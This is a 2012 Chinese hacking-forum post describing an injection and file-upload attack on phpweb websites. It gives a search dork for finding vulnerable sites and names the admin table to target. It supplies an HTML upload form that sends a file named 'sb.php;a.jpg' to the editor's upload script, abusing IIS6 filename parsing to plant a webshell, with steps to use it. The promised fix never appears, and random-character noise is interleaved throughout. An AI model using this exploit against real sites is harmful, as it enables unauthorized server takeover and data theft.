中国网络渗透测试联盟
标题:
phpweb成品网站全版本通杀注入漏洞及修复
[打印本页]
作者:
admin
时间:
2012-11-9 20:52
标题:
phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id
5 I5 a3 E* z# g! C% R
6 V& B. W. u+ S8 v1 d$ y
数据表:pwn_base_admin
, R) W+ Q% y9 L4 [* r" G
2 Q. t" S3 ?0 e8 _1 _- o
关于拿shell
" D F& _1 _ T& d
% I4 y, O, v+ {- M. _$ w2 f
首先登录后台admin.php
9 F- d, J1 \/ E/ Y& m
) C% L+ O& P# e/ A i
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
) X0 F/ ]& x6 F- d; C) A
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
- v9 X, u3 w" v" U
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
; \0 A7 Q- n, n, X* Q# X
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
: L9 q4 c/ k* a& R1 x
<input type="text" name="fileName" value="sb.php;a.jpg" />
0 {4 T. G# ^; i$ P' X& X
<input type="hidden" name="attachPath" value="news/pics/" />
( K/ i- ]7 C6 i$ ]
<input type="file" name="fileData" size="14" /></td>
6 ]" a* w% l; x% T/ W" Y
<input type="submit" name="button" value="确定" />
2 C- m+ g* |* J% _9 p
</form>
+ d9 l: G" b- `
0 [; d- h7 f0 d( C; f& @0 S3 N
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
' U% R9 O- S. C0 Q
" {" G# y+ a) I# k; ~
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2